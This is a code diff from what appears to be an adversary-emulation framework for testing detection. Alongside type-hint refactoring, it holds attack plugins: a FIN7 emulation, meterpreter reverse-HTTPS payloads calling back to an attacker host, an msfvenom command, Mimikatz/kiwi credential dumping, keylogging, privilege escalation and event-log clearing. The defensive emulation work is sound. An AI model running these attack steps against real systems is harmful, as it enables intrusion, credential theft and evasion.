@ -61,7 +62,7 @@ class MachineryPlugin(BasePlugin):
""" Connect to a machine """
raise NotImplementedError
def remote_run(self, cmd, disown=False):
def remote_run(self, cmd: str, disown: bool = False):
""" Connects to the machine and runs a command there
@ -75,7 +76,7 @@ class MachineryPlugin(BasePlugin):
""" Disconnect from a machine """
raise NotImplementedError
def put(self, src, dst):
def put(self, src: str, dst: str):
""" Send a file to a machine
@param src: source dir
@ -83,7 +84,7 @@ class MachineryPlugin(BasePlugin):
"""
raise NotImplementedError
def get(self, src, dst):
def get(self, src: str, dst: str):
""" Get a file to a machine
@param src: source dir
@ -108,8 +109,11 @@ class MachineryPlugin(BasePlugin):
return self.config.get_playground()
def get_vm_name(self):
""" Get the specific name of the machine """
def get_vm_name(self) -> str:
""" Get the specific name of the machine
@returns: the machine name
"""
return self.config.vmname()
@ -140,7 +144,7 @@ class MachineryPlugin(BasePlugin):
self.config = config
self.process_config(config.raw_config)
def __call_remote_run__(self, cmd, disown=False):
def __call_remote_run__(self, cmd: str, disown: bool = False):
""" Simplifies connect and run
@param cmd: Command to run as shell command
@ -164,7 +168,7 @@ class MachineryPlugin(BasePlugin):
self.up()
def __call_create__(self, reboot=True):
def __call_create__(self, reboot: bool = True):
""" Create a VM
@param reboot: Reboot the VM during installation. Required if you want to install software

@ -2,26 +2,27 @@
""" Base class for all plugin types """
import os
from typing import Optional
import yaml
# from shutil import copy
from app.exceptions import PluginError
import app.exceptions
from app.exceptions import PluginError # type: ignore
import app.exceptions # type: ignore
class BasePlugin():
""" Base class for plugins """
required_files = None # a list of files shipped with the plugin to be installed
name = None # The name of the plugin
alternative_names = [] # The is an optional list of alternative names
description = None # The description of this plugin
required_files: list[str] = [] # a list of files shipped with the plugin to be installed
name: str = "" # The name of the plugin
alternative_names: list[str] = [] # The is an optional list of alternative names
description: Optional[str] = None # The description of this plugin
def __init__(self):
def __init__(self) -> None:
# self.machine = None
self.plugin_path = None
self.plugin_path: Optional[str] = None
self.machine_plugin = None
self.sysconf = {}
self.conf = {}
# self.sysconf = {}
self.conf: dict = {}
self.attack_logger = None
self.default_config_name = "default_config.yaml"
@ -81,7 +82,7 @@ class BasePlugin():
# self.sysconf["abs_machinepath_external"] = config["abs_machinepath_external"]
self.load_default_config()
def process_config(self, config):
def process_config(self, config: dict):
""" process config and use defaults if stuff is missing
@param config: The config dict
@ -91,7 +92,7 @@ class BasePlugin():
self.conf = {**self.conf, **config}
def copy_to_machine(self, filename):
def copy_to_machine(self, filename: str):
""" Copies a file shipped with the plugin to the machine share folder
@param filename: File from the plugin folder to copy to the machine share.
@ -99,12 +100,17 @@ class BasePlugin():
if self.machine_plugin is not None:
self.machine_plugin.put(filename, self.machine_plugin.get_playground())
else:
raise PluginError("Missing machine")
def get_from_machine(self, src, dst):
def get_from_machine(self, src: str, dst: str):
""" Get a file from the machine """
self.machine_plugin.get(src, dst) # nosec
if self.machine_plugin is not None:
self.machine_plugin.get(src, dst) # nosec
else:
raise PluginError("Missing machine")
def run_cmd(self, command, disown=False):
def run_cmd(self, command: str, disown: bool = False):
""" Execute a command on the vm using the connection
@param command: Command to execute
@ -126,7 +132,7 @@ class BasePlugin():
raise NotImplementedError
def get_names(self) -> []:
def get_names(self) -> list[str]:
""" Adds the name of the plugin to the alternative names and returns the list """
res = set()
@ -183,20 +189,20 @@ class BasePlugin():
if self.conf is None:
self.conf = {}
def get_config_section_name(self):
def get_config_section_name(self) -> str:
""" Returns the name for the config sub-section to use for this plugin.
Defaults to the name of the plugin. This method should be overwritten if it gets more complicated """
return self.get_name()
def main_path(self): # pylint:disable=no-self-use
def main_path(self) -> str: # pylint:disable=no-self-use
""" Returns the main path of the Purple Dome installation """
app_dir = os.path.dirname(app.exceptions.__file__)
return os.path.split(app_dir)[0]
def vprint(self, text, verbosity):
def vprint(self, text: str, verbosity: int):
""" verbosity based stdout printing
0: Errors only
@ -207,5 +213,5 @@ class BasePlugin():
@param text: The text to print
@param verbosity: the verbosity level the text has.
"""
self.attack_logger.vprint(text, verbosity)
if self.attack_logger is not None:
self.attack_logger.vprint(text, verbosity)

@ -2,9 +2,11 @@
""" A base plugin class for sensors. Anything installed on the target to collect system information and identify the attack """
import os
from typing import Optional
from plugins.base.plugin_base import BasePlugin
class SensorPlugin(BasePlugin):
""" A sensor will be running on the target machine and monitor attacks. To remote control those sensors
there are sensor plugins. This is the base class for them
@ -12,28 +14,28 @@ class SensorPlugin(BasePlugin):
"""
# Boilerplate
name = None
name: Optional[str] = None
required_files = []
required_files: list[str] = []
def __init__(self):
super().__init__() # pylint:disable=useless-super-delegation
self.debugit = False
def prime(self): # pylint: disable=no-self-use
def prime(self) -> bool: # pylint: disable=no-self-use
""" prime sets hard core configs in the target. You can use it to call everything that permanently alters the OS by settings.
If your prime function returns True the machine will be rebooted after prime-ing it. This is very likely what you want. Only use prime if install is not sufficient.
"""
return False
def install(self): # pylint: disable=no-self-use
def install(self) -> bool: # pylint: disable=no-self-use
""" Install the sensor. Executed on the target. Take the sensor from the share and (maybe) copy it to its destination. Do some setup
"""
return True
def start(self, disown=None): # pylint: disable=unused-argument, no-self-use
def start(self, disown=None) -> bool: # pylint: disable=unused-argument, no-self-use
""" Start the sensor. The connection to the client is disowned here. = Sent to background. This keeps the process running.
@param disown: Send async into background
@ -41,22 +43,22 @@ class SensorPlugin(BasePlugin):
return True
def stop(self): # pylint: disable=no-self-use
def stop(self) -> bool: # pylint: disable=no-self-use
""" Stop the sensor """
return True
def __call_collect__(self, machine_path):
def __call_collect__(self, machine_path: str):
""" Generate the data collect command
@param machine_path: Machine specific path to collect data into
"""
path = os.path.join(machine_path, "sensors", self.name)
path = os.path.join(machine_path, "sensors", self.name) # type: ignore
os.makedirs(path)
return self.collect(path)
def collect(self, path) -> []:
def collect(self, path: str) -> list[str]:
""" Collect data from sensor. Copy it from sensor collection dir on target OS to the share
@param path: The path to copy the data into

@ -62,7 +62,7 @@ class SSHFeatures(BasePlugin):
self.vprint("SSH network error", 0)
raise NetworkError
def remote_run(self, cmd, disown=False):
def remote_run(self, cmd: str, disown: bool = False):
""" Connects to the machine and runs a command there
@param cmd: The command to execute
@ -109,7 +109,7 @@ class SSHFeatures(BasePlugin):
return ""
def put(self, src, dst):
def put(self, src: str, dst: str):
""" Send a file to a machine
@param src: source dir
@ -148,7 +148,7 @@ class SSHFeatures(BasePlugin):
self.vprint("SSH network error on PUT command", 0)
raise NetworkError
def get(self, src, dst):
def get(self, src: str, dst: str):
""" Get a file to a machine
@param src: source dir

@ -2,6 +2,7 @@
""" This is a specific plugin type that installs a vulnerability into a VM. This can be a vulnerable application or a configuration setting """
from typing import Optional
from plugins.base.plugin_base import BasePlugin
@ -10,12 +11,12 @@ class VulnerabilityPlugin(BasePlugin):
"""
# Boilerplate
name = None
description = None
ttp = None
name: Optional[str] = None
description: Optional[str] = None
ttp: Optional[str] = None
references = None
required_files = []
required_files: list[str] = []
def __init__(self):
super().__init__() # pylint:disable=useless-super-delegation

@ -1,10 +1,11 @@
#!/usr/bin/env python3
# Adversary emulation for FIN7
import socket
from plugins.base.attack import AttackPlugin
from plugins.base.attack import AttackPlugin, Requirement
from app.interface_sfx import CommandlineColors
from app.metasploit import MSFVenom, MetasploitInstant
from app.metasploit import MSFVenom
import os
import time
@ -19,6 +20,8 @@ class FIN7Plugin(AttackPlugin):
required_files_attacker = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [Requirement.CALDERA, Requirement.METASPLOIT]
######
payload_type_1 = "windows/x64/meterpreter/reverse_https" # payload for initial stage
@ -27,21 +30,24 @@ class FIN7Plugin(AttackPlugin):
self.plugin_path = __file__
self.metasploit_1 = None
def get_metasploit_1(self):
""" Returns a metasploit with a session for the first targeted machine """
if self.metasploit_1:
return self.metasploit_1
def get_metasploit_1(self, payload):
""" Returns a metasploit with a session for the first targeted machine
@param payload: payload description. waiting for this payload. Like "windows/x64/meterpreter/reverse_https"
"""
if self.metasploit:
return self.metasploit
self.connect_metasploit()
self.metasploit_1 = MetasploitInstant(self.metasploit_password, attack_logger=self.attack_logger, attacker=self.attacker_machine_plugin, username=self.metasploit_user)
self.metasploit_1.start_exploit_stub_for_external_payload(payload=self.payload_type_1)
self.metasploit_1.wait_for_session()
return self.metasploit_1
ip = socket.gethostbyname(self.attacker_machine_plugin.get_ip())
self.metasploit.start_exploit_stub_for_external_payload(payload=self.payload_type_1, lhost=ip)
self.metasploit.wait_for_session()
return self.metasploit
def step1(self):
self.attack_logger.vprint(f"{CommandlineColors.OKBLUE}Step 1 (target hotelmanager): Initial Breach{CommandlineColors.ENDC}", 1)
self.attack_logger.start_narration(
"Step 1 (target hotelmanager): Initial Breach\n----------------------------")
self.attack_logger.start_attack_step("Step 1 (target hotelmanager): Initial Breach")
self.attack_logger.start_narration("""
NOT IMPLEMENTED YET
@ -68,8 +74,7 @@ This is the initial attack step that requires user interaction. Maybe it is bett
def step2(self):
self.attack_logger.vprint(f"{CommandlineColors.OKBLUE}Step 2 (target hotelmanager): Delayed Malware Execution{CommandlineColors.ENDC}", 1)
self.attack_logger.start_narration(
"Step 2 (target hotelmanager): Delayed Malware Execution\n----------------------------")
self.attack_logger.start_attack_step("Step 2 (target hotelmanager): Delayed Malware Execution")
self.attack_logger.start_narration("""
NOT IMPLEMENTED YET
@ -92,7 +97,7 @@ In this simulation sql-rat.js communication will be replaced by Caldera communic
def step3(self):
self.attack_logger.vprint(
f"{CommandlineColors.OKBLUE}Step 3 (target hotelmanager): Target Assessment{CommandlineColors.ENDC}", 1)
self.attack_logger.start_narration("Step 3 (target hotelmanager): Target Assessment\n----------------------------")
self.attack_logger.start_attack_step("Step 3 (target hotelmanager): Target Assessment")
# TODO: Make sure logging is nice and complete
@ -179,7 +184,6 @@ In this simulation sql-rat.js communication will be replaced by Caldera communic
# Generate shellcode
# msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.0.4 LPORT=443 EXITFUNC=thread -f C --encrypt xor --encrypt-key m
dl_uri = "https://raw.githubusercontent.com/center-for-threat-informed-defense/adversary_emulation_library/master/fin7/Resources/Step4/babymetal/babymetal.cpp"
architecture = "x64"
target_platform = "windows"
@ -238,7 +242,7 @@ In this simulation sql-rat.js communication will be replaced by Caldera communic
# base64 conversion
self.attacker_machine_plugin.remote_run(f"cd tool_factory/step_4; base64 babymetal.bin > {encoded_filename}")
self.attack_logger.stop_build(logid = logid)
self.attack_logger.stop_build(logid=logid)
self.attack_logger.vprint(
f"{CommandlineColors.OKGREEN}Step 4 compiling tools{CommandlineColors.ENDC}", 1)
@ -250,8 +254,7 @@ In this simulation sql-rat.js communication will be replaced by Caldera communic
"""
self.attack_logger.vprint(
f"{CommandlineColors.OKBLUE}Step 4 (target hotelmanager): Staging Interactive Toolkit{CommandlineColors.ENDC}", 1)
self.attack_logger.start_narration(
"Step 4 (target hotelmanager): Staging Interactive Toolkit\n----------------------------")
self.attack_logger.start_attack_step("Step 4 (target hotelmanager): Staging Interactive Toolkit")
self.attack_logger.start_narration("""
In the original attack Babymetal payload is a dll. Currently we are using a simplification here (directly calling a exe). The original steps are:
* Target already runs adb156.exe. This one gets the shellcode over the network connection and decodes it.
@ -271,8 +274,10 @@ In the original attack Babymetal payload is a dll. Currently we are using a simp
# TODO: Babymetal payload is a dll. Currently we are using a simplification here (exe). Implement the proper steps.
payload = self.payload_type_1
venom = MSFVenom(self.attacker_machine_plugin, hotelmanager, self.attack_logger)
venom.generate_and_deploy(payload=self.payload_type_1,
venom.generate_and_deploy(payload=payload,
architecture="x64",
platform="windows",
lhost=self.attacker_machine_plugin.get_ip(),
@ -288,9 +293,10 @@ In the original attack Babymetal payload is a dll. Currently we are using a simp
# TODO: invoke-Shellcode.ps1 loads shellcode into powershell.exe memory (Allocate memory, copy shellcode, start thread) (received from C2 server) https://attack.mitre.org/techniques/T1573/
# https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/master/fin7/Resources/Step4/babymetal/Invoke-Shellcode.ps1
# metasploit1 = self.get_metasploit_1()
# print("Got session, calling command")
# print(metasploit.meterpreter_execute_on(["getuid"], hotelmanager))
metasploit1 = self.get_metasploit_1(payload)
print("Got session, calling command")
print(metasploit1.meterpreter_execute_on(["getuid"], hotelmanager))
print("Should have called session now")
self.attack_logger.vprint(
f"{CommandlineColors.OKGREEN}End Step 4: Staging Interactive Toolkit{CommandlineColors.ENDC}", 1)
@ -298,13 +304,14 @@ In the original attack Babymetal payload is a dll. Currently we are using a simp
def step5(self):
self.attack_logger.vprint(
f"{CommandlineColors.OKBLUE}Step 5 (target hotelmanager): Escalate Privileges{CommandlineColors.ENDC}", 1)
self.attack_logger.start_narration(
"Step 5 (target hotelmanager): Escalate Privileges\n----------------------------")
self.attack_logger.start_attack_step("Step 5 (target hotelmanager): Escalate Privileges")
hotelmanager = self.get_target_by_name("hotelmanager")
payload = self.payload_type_1
# This is meterpreter !
metasploit = self.get_metasploit_1()
metasploit = self.get_metasploit_1(payload)
# powershell -> CreateToolHelp32Snapshot() for process discovery (Caldera alternative ?) https://attack.mitre.org/techniques/T1057/
self.attack_logger.vprint(f"{CommandlineColors.OKCYAN}Execute ps -ax through meterpreter{CommandlineColors.ENDC}", 1)
@ -379,12 +386,14 @@ In the original attack Babymetal payload is a dll. Currently we are using a simp
situation_description="Executing Mimikatz through UAC bypassing powershell",
countermeasure="Behaviour detection"
)
print(metasploit.meterpreter_execute_on([execute_samcats], hotelmanager, delay=20))
result = metasploit.meterpreter_execute_on([execute_samcats], hotelmanager, delay=20)
print(result)
self.attack_logger.stop_metasploit_attack(source=self.attacker_machine_plugin.get_ip(),
target=hotelmanager.get_ip(),
metasploit_command=execute_samcats,
ttp="T1003",
logid=logid)
logid=logid,
result=result)
# samcat.exe: reads local credentials https://attack.mitre.org/techniques/T1003/001/
@ -472,8 +481,7 @@ In the original attack Babymetal payload is a dll. Currently we are using a simp
def step6(self):
self.attack_logger.vprint(
f"{CommandlineColors.OKBLUE}Step 6 (target hotelmanager -> itadmin): Expand Access{CommandlineColors.ENDC}", 1)
self.attack_logger.start_narration(
"Step 6 (target hotelmanager and itadmin): Expand Access\n----------------------------")
self.attack_logger.start_attack_step("Step 6 (target hotelmanager and itadmin): Expand Access")
self.attack_logger.start_narration("""
NOT IMPLEMENTED YET. NEEDS A SECOND MACHINE FOR LATERAL MOVEMENT
* powershell download: paexec.exe and hollow.exe https://attack.mitre.org/techniques/T1105/
@ -534,8 +542,7 @@ NOT IMPLEMENTED YET. NEEDS A SECOND MACHINE FOR LATERAL MOVEMENT
def step7(self):
self.attack_logger.vprint(
f"{CommandlineColors.OKBLUE}Step 7 on itadmin: Setup User Monitoring{CommandlineColors.ENDC}", 1)
self.attack_logger.start_narration(
"Step 7 (target itadmin): Setup User Monitoring\n----------------------------")
self.attack_logger.start_attack_step("Step 7 (target itadmin): Setup User Monitoring")
self.attack_logger.start_narration("""
NOT IMPLEMENTED YET. A REPLACEMENT FOR THE ALOHA COMMAND CENTER IS NEEDED
@ -570,8 +577,7 @@ NOT IMPLEMENTED YET. A REPLACEMENT FOR THE ALOHA COMMAND CENTER IS NEEDED
def step8(self):
self.attack_logger.vprint(
f"{CommandlineColors.OKBLUE}Step 8 (target: itadmin as domain_admin): User Monitoring{CommandlineColors.ENDC}", 1)
self.attack_logger.start_narration(
"Step 8 (target itadmin): User Monitoring\n----------------------------")
self.attack_logger.start_attack_step("Step 8 (target itadmin): User Monitoring")
self.attack_logger.start_narration("""
NOT IMPLEMENTED YET. MAYBE DO THIS PARTIAL. KEYLOGGING NEEDS USER INTERACTION.
(Screen spying and keylogging are already implemented as standalone metasploit attacks. Use them)
@ -622,7 +628,7 @@ NOT IMPLEMENTED YET. MAYBE DO THIS PARTIAL. KEYLOGGING NEEDS USER INTERACTION.
lport=lport,
filename=filename,
for_step=for_step,
sRDI_conversion= sRDI_conversion,
sRDI_conversion=sRDI_conversion,
encoded_filename=encoded_filename,
comment="And SRDI converted Meterpreter shell. Will be stored in the registry.")
@ -691,8 +697,7 @@ NOT IMPLEMENTED YET. MAYBE DO THIS PARTIAL. KEYLOGGING NEEDS USER INTERACTION.
def step9(self):
self.attack_logger.vprint(
f"{CommandlineColors.OKBLUE}Step 9 (target: accounting): Setup Shim Persistence{CommandlineColors.ENDC}", 1)
self.attack_logger.start_narration(
"Step 9 (target accounting): Setup Shim Persistence\n----------------------------")
self.attack_logger.start_attack_step("Step 9 (target accounting): Setup Shim Persistence")
self.attack_logger.start_narration("""
NOT IMPLEMENTED YET
@ -730,11 +735,11 @@ NOT IMPLEMENTED YET
filename = "AccountingIQ.exe"
dl_uri = "https://raw.githubusercontent.com/center-for-threat-informed-defense/adversary_emulation_library/master/fin7/Resources/Step10/AccountingIQ.c"
logid = self.attack_logger.start_build(
filename=filename,
logid = self.attack_logger.start_build(filename=filename,
for_step=10,
dl_uri=dl_uri,
comment="This is a simulated credit card tool to target. The final flag is in here.")
comment="This is a simulated credit card tool to target. The final flag is in here."
)
# simulated credit card tool as target
self.attacker_machine_plugin.remote_run("mkdir tool_factory/step_10") # MSFVenom needs to be installed
self.attacker_machine_plugin.remote_run(f"cd tool_factory/step_10; rm {filename}")
@ -782,8 +787,7 @@ NOT IMPLEMENTED YET
self.attack_logger.vprint(
f"{CommandlineColors.OKBLUE}Step 10 (target: accounting): Steal Payment Data{CommandlineColors.ENDC}", 1)
self.attack_logger.start_narration(
"Step 10 (target accounting): Steal Payment Data\n----------------------------")
self.attack_logger.start_attack_step("Step 10 (target accounting): Steal Payment Data")
self.attack_logger.start_narration("""
NOT IMPLEMENTED YET. NEEDS TARGET REBOOTING: NO IDEA IF ATTACKX CAN SUPPORT THAT

@ -2,8 +2,7 @@
# A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin
from app.metasploit import MetasploitInstant
from plugins.base.attack import AttackPlugin, Requirement
class MetasploitArpPlugin(AttackPlugin):
@ -15,6 +14,7 @@ class MetasploitArpPlugin(AttackPlugin):
references = ["https://attack.mitre.org/techniques/T1016/"]
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [Requirement.METASPLOIT]
def __init__(self):
super().__init__()
@ -31,13 +31,14 @@ class MetasploitArpPlugin(AttackPlugin):
payload_name = "babymetal.exe"
target = self.targets[0]
metasploit = MetasploitInstant(self.metasploit_password,
attack_logger=self.attack_logger,
attacker=self.attacker_machine_plugin,
username=self.metasploit_user)
# self.connect_metasploit()
metasploit.smart_infect(target, payload_type, payload_name, )
self.metasploit.smart_infect(target,
payload=payload_type,
outfile=payload_name,
format="exe",
architecture="x64")
metasploit.arp_network_discovery(target)
self.metasploit.arp_network_discovery(target)
return res

@ -2,8 +2,7 @@
# A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin
from app.metasploit import MetasploitInstant
from plugins.base.attack import AttackPlugin, Requirement
class MetasploitClearevPlugin(AttackPlugin):
@ -16,6 +15,8 @@ class MetasploitClearevPlugin(AttackPlugin):
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [Requirement.METASPLOIT]
def __init__(self):
super().__init__()
self.plugin_path = __file__
@ -27,17 +28,16 @@ class MetasploitClearevPlugin(AttackPlugin):
"""
res = ""
payload_type = "windows/meterpreter_reverse_https"
payload_type = "windows/x64/meterpreter/reverse_https"
payload_name = "babymetal.exe"
target = self.targets[0]
metasploit = MetasploitInstant(self.metasploit_password,
attack_logger=self.attack_logger,
attacker=self.attacker_machine_plugin,
username=self.metasploit_user)
metasploit.smart_infect(target, payload_type, payload_name, )
self.metasploit.smart_infect(target,
payload=payload_type,
outfile=payload_name,
format="exe",
architecture="x64")
metasploit.clearev(target)
self.metasploit.clearev(target)
return res

@ -0,0 +1,8 @@
###
# The getsystem variant to use.
# See: https://docs.rapid7.com/metasploit/meterpreter-getsystem/
# 0: auto
# 1: Named Pipe Impersonation (In Memory/Admin)
# 2: Named Pipe Impersonation (Dropper/Admin)
# 3: Token Duplication (In Memory/Admin)
variant: 0

@ -2,8 +2,8 @@
# A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin
from app.metasploit import MetasploitInstant
from plugins.base.attack import AttackPlugin, Requirement
import socket
class MetasploitGetsystemPlugin(AttackPlugin):
@ -16,6 +16,8 @@ class MetasploitGetsystemPlugin(AttackPlugin):
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [Requirement.METASPLOIT]
def __init__(self):
super().__init__()
self.plugin_path = __file__
@ -28,20 +30,26 @@ class MetasploitGetsystemPlugin(AttackPlugin):
self.attack_logger.start_narration("A metasploit command like that is used to get system privileges for the next attack step.")
res = ""
payload_type = "windows/meterpreter/reverse_https"
payload_type = "windows/x64/meterpreter/reverse_https"
payload_name = "babymetal.exe"
target = self.targets[0]
metasploit = MetasploitInstant(self.metasploit_password,
attack_logger=self.attack_logger,
attacker=self.attacker_machine_plugin,
username=self.metasploit_user)
ip = socket.gethostbyname(self.attacker_machine_plugin.get_ip())
self.metasploit.smart_infect(target,
payload=payload_type,
architecture="x64",
platform="windows",
lhost=ip,
format="exe",
outfile=payload_name)
metasploit.smart_infect(target, payload_type, payload_name, )
# TODO: https://github.com/rapid7/metasploit-payloads/blob/master/c/meterpreter/source/extensions/priv/elevate.c#L70
metasploit.getsystem(target,
situation_description="This is an example standalone attack step. In real world attacks there would be events before and after",
countermeasure="Observe how pipes are used. Take steps before (gaining access) and after (abusing those new privileges) into account for detection."
)
self.metasploit.getsystem(target,
variant=self.conf['variant'],
situation_description="This is an example standalone attack step. In real world attacks there would be events before and after",
countermeasure="Observe how pipes are used. Take steps before (gaining access) and after (abusing those new privileges) into account for detection."
)
return res

@ -2,8 +2,7 @@
# A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin
from app.metasploit import MetasploitInstant
from plugins.base.attack import AttackPlugin, Requirement
class MetasploitGetuidPlugin(AttackPlugin):
@ -16,6 +15,8 @@ class MetasploitGetuidPlugin(AttackPlugin):
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [Requirement.METASPLOIT]
def __init__(self):
super().__init__()
self.plugin_path = __file__
@ -27,18 +28,17 @@ class MetasploitGetuidPlugin(AttackPlugin):
"""
res = ""
payload_type = "windows/meterpreter_reverse_https"
payload_type = "windows/x64/meterpreter/reverse_https"
payload_name = "babymetal.exe"
target = self.targets[0]
metasploit = MetasploitInstant(self.metasploit_password,
attack_logger=self.attack_logger,
attacker=self.attacker_machine_plugin,
username=self.metasploit_user)
metasploit.smart_infect(target, payload_type, payload_name, )
self.metasploit.smart_infect(target,
payload=payload_type,
outfile=payload_name,
format="exe",
architecture="x64")
uid = metasploit.getuid(target)
uid = self.metasploit.getuid(target)
print(f"UID: {uid}")
return res

@ -2,8 +2,7 @@
# A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin
from app.metasploit import MetasploitInstant
from plugins.base.attack import AttackPlugin, Requirement
class MetasploitKeyloggingPlugin(AttackPlugin):
@ -16,6 +15,8 @@ class MetasploitKeyloggingPlugin(AttackPlugin):
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [Requirement.METASPLOIT]
def __init__(self):
super().__init__()
self.plugin_path = __file__
@ -27,19 +28,18 @@ class MetasploitKeyloggingPlugin(AttackPlugin):
"""
res = ""
payload_type = "windows/meterpreter_reverse_https"
payload_type = "windows/x64/meterpreter/reverse_https"
payload_name = "babymetal.exe"
target = self.targets[0]
metasploit = MetasploitInstant(self.metasploit_password,
attack_logger=self.attack_logger,
attacker=self.attacker_machine_plugin,
username=self.metasploit_user)
metasploit.smart_infect(target, payload_type, payload_name, )
self.metasploit.smart_infect(target,
payload=payload_type,
outfile=payload_name,
format="exe",
architecture="x64")
metasploit.migrate(target, name="winlogon.exe")
self.metasploit.migrate(target, name="winlogon.exe")
metasploit.keylogging(target, monitoring_time=20)
self.metasploit.keylogging(target, monitoring_time=20)
return res

@ -0,0 +1,5 @@
###
# The kiwi command to use.
# See: https://www.hackers-arise.com/post/2018/11/26/metasploit-basics-part-21-post-exploitation-with-mimikatz
# Some options: creds_all, creds_kerberos, creds msv, creds_ssp, creds_tspkg, creds_wdigest, wifi_list, wifi_list_shared
variant: creds_all

@ -0,0 +1,53 @@
#!/usr/bin/env python3
# A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin, Requirement
import socket
class MetasploitKiwiPlugin(AttackPlugin):
# Boilerplate
name = "metasploit_kiwi"
description = "Extract credentials from memory. Kiwi is the more modern Mimikatz"
ttp = "t1003"
references = ["https://www.hackers-arise.com/post/2018/11/26/metasploit-basics-part-21-post-exploitation-with-mimikatz"]
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [Requirement.METASPLOIT]
def __init__(self):
super().__init__()
self.plugin_path = __file__
def run(self, targets):
""" Run the command
@param targets: A list of targets, ip addresses will do
"""
self.attack_logger.start_narration("Extracting user credentials from memory.")
res = ""
payload_type = "windows/x64/meterpreter/reverse_https"
payload_name = "babymetal.exe"
target = self.targets[0]
ip = socket.gethostbyname(self.attacker_machine_plugin.get_ip())
self.metasploit.smart_infect(target,
payload=payload_type,
architecture="x64",
platform="windows",
lhost=ip,
format="exe",
outfile=payload_name)
self.metasploit.kiwi(target,
variant=self.conf['variant'],
situation_description="Kiwi is the modern version of mimikatz. It is integrated into metasploit. The attacker wants to get some credentials - reading them from memory.",
countermeasure="Memory access into critical processes should be monitored."
)
return res

@ -2,8 +2,8 @@
# A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin
from app.metasploit import MetasploitInstant
from plugins.base.attack import AttackPlugin, Requirement
import socket
class MetasploitMigratePlugin(AttackPlugin):
@ -16,6 +16,8 @@ class MetasploitMigratePlugin(AttackPlugin):
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [Requirement.METASPLOIT]
def __init__(self):
super().__init__()
self.plugin_path = __file__
@ -27,17 +29,21 @@ class MetasploitMigratePlugin(AttackPlugin):
"""
res = ""
payload_type = "windows/meterpreter_reverse_https"
payload_type = "windows/x64/meterpreter/reverse_https"
payload_name = "babymetal.exe"
target = self.targets[0]
metasploit = MetasploitInstant(self.metasploit_password,
attack_logger=self.attack_logger,
attacker=self.attacker_machine_plugin,
username=self.metasploit_user)
ip = socket.gethostbyname(self.attacker_machine_plugin.get_ip())
metasploit.smart_infect(target, payload_type, payload_name, )
self.metasploit.smart_infect(target,
payload=payload_type,
architecture="x64",
platform="windows",
lhost=ip,
format="exe",
outfile=payload_name
)
metasploit.migrate(target, user="NT AUTHORITY\\SYSTEM", name="svchost.exe", arch="x64")
self.metasploit.migrate(target, user="NT AUTHORITY\\SYSTEM", name="svchost.exe", arch="x64")
return res

@ -2,8 +2,7 @@
# A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin
from app.metasploit import MetasploitInstant
from plugins.base.attack import AttackPlugin, Requirement
class MetasploitPsPlugin(AttackPlugin):
@ -16,6 +15,8 @@ class MetasploitPsPlugin(AttackPlugin):
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [Requirement.METASPLOIT]
def __init__(self):
super().__init__()
self.plugin_path = __file__
@ -31,13 +32,12 @@ class MetasploitPsPlugin(AttackPlugin):
payload_name = "babymetal.exe"
target = self.targets[0]
metasploit = MetasploitInstant(self.metasploit_password,
attack_logger=self.attack_logger,
attacker=self.attacker_machine_plugin,
username=self.metasploit_user)
metasploit.smart_infect(target, payload_type, payload_name, )
self.metasploit.smart_infect(target,
payload=payload_type,
outfile=payload_name,
format="exe",
architecture="x64")
metasploit.ps_process_discovery(target)
self.metasploit.ps_process_discovery(target)
return res

@ -2,8 +2,7 @@
# A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin
from app.metasploit import MetasploitInstant
from plugins.base.attack import AttackPlugin, Requirement
class MetasploitScreengrabPlugin(AttackPlugin):
@ -16,6 +15,8 @@ class MetasploitScreengrabPlugin(AttackPlugin):
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [Requirement.METASPLOIT]
def __init__(self):
super().__init__()
self.plugin_path = __file__
@ -27,19 +28,18 @@ class MetasploitScreengrabPlugin(AttackPlugin):
"""
res = ""
payload_type = "windows/meterpreter_reverse_https"
payload_type = "windows/x64/meterpreter/reverse_https"
payload_name = "babymetal.exe"
target = self.targets[0]
metasploit = MetasploitInstant(self.metasploit_password,
attack_logger=self.attack_logger,
attacker=self.attacker_machine_plugin,
username=self.metasploit_user)
metasploit.smart_infect(target, payload_type, payload_name, )
self.metasploit.smart_infect(target,
payload=payload_type,
outfile=payload_name,
format="exe",
architecture="x64")
metasploit.migrate(target, user="NT AUTHORITY\\SYSTEM")
self.metasploit.migrate(target, user="NT AUTHORITY\\SYSTEM")
metasploit.screengrab(target)
self.metasploit.screengrab(target)
return res

@ -2,8 +2,7 @@
# A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin
from app.metasploit import MetasploitInstant
from plugins.base.attack import AttackPlugin, Requirement
class MetasploitSysinfoPlugin(AttackPlugin):
@ -16,6 +15,8 @@ class MetasploitSysinfoPlugin(AttackPlugin):
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [Requirement.METASPLOIT]
def __init__(self):
super().__init__()
self.plugin_path = __file__
@ -27,18 +28,17 @@ class MetasploitSysinfoPlugin(AttackPlugin):
"""
res = ""
payload_type = "windows/meterpreter_reverse_https"
payload_type = "windows/x64/meterpreter/reverse_https"
